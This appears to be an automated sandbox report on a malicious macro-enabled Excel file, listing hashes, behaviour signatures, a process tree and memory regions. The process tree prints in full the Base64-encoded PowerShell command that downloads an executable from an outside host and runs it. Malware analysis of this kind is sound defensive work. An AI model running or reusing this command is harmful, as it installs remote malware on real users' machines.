Analysis

  • max time kernel
    140s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2024, 00:35

General

  • Target

    4cdf257d1c1771b1ecd147badf058d02.xlsm

  • Size

    42KB

  • MD5

    4cdf257d1c1771b1ecd147badf058d02

  • SHA1

    a62dc214003f943b9242e628c7b6a1891000984e

  • SHA256

    dbab36b0c92470f2cffe6d16e31e58d52668605a7179d47542c4bbd2c41c15a3

  • SHA512

    96b5c89b90fd6f8b83696a81da2ff966cf03174de788a3efc7a65c51b06533386ec023a36b748440c41ea85e6ca07edd117e5202034def5644aba7db0fa0263f

  • SSDEEP

    768:Wv65bfxH+zrZN0DGCfkyX3eks4pSGn0Qic3q8Wt4oLZN4q:a6LIGzfPeUv02Q4c5

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4cdf257d1c1771b1ecd147badf058d02.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4208
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:744
  • C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:716

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xa50bq5p.fxa.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/744-3780-0x00007FF80E530000-0x00007FF80EFF1000-memory.dmp

          Filesize

          10.8MB

        • memory/744-3775-0x00007FF80E530000-0x00007FF80EFF1000-memory.dmp

          Filesize

          10.8MB

        • memory/744-3777-0x000001EA91520000-0x000001EA91530000-memory.dmp

          Filesize

          64KB

        • memory/744-3776-0x000001EA91520000-0x000001EA91530000-memory.dmp

          Filesize

          64KB

        • memory/744-3774-0x000001EA916E0000-0x000001EA91702000-memory.dmp

          Filesize

          136KB

        • memory/4208-21-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-98-0x000002264D3D0000-0x000002264DBD0000-memory.dmp

          Filesize

          8.0MB

        • memory/4208-20-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-2-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-22-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-19-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-18-0x00007FF7F5620000-0x00007FF7F5630000-memory.dmp

          Filesize

          64KB

        • memory/4208-16-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-13-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-10-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-9-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-8-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-7-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-4-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-3-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-1-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-0-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-17-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-12-0x00007FF7F5620000-0x00007FF7F5630000-memory.dmp

          Filesize

          64KB

        • memory/4208-15-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-14-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-11-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-5-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-6-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-3784-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-3787-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-3788-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-3789-0x000002264D3D0000-0x000002264DBD0000-memory.dmp

          Filesize

          8.0MB

        • memory/4208-3809-0x00007FF8376B0000-0x00007FF8378A5000-memory.dmp

          Filesize

          2.0MB

        • memory/4208-3808-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-3807-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-3806-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB

        • memory/4208-3805-0x00007FF7F7730000-0x00007FF7F7740000-memory.dmp

          Filesize

          64KB